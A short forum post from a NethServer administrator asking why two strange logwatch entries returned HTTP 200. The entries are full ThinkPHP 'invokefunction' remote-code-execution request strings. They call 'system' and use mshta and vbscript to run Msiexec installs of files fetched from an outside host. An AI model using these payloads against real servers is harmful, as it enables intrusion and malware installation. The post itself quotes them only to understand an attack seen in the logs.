NethServer Version: 7.6-1810
I have logwatch running on a server. This morning I found a couple of very strange entries listed:
/?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array& vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op.Cnazb.Xyz/PHP1.jpg%20/Q)\",0)(window.close) HTTP Response 200
/?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op.Cnazb.Xyz/PHP2.jpg%20/Q)\",0)(window.close) HTTP Response 200
The attempt is not going to do anything on a Nethserver machine (at least I don’t see how it could do anything, given that it seems to refer to VB code). What puzzles me is the HTTP Response 200, which indicates success. Success at what?
Does anyone have any ideas?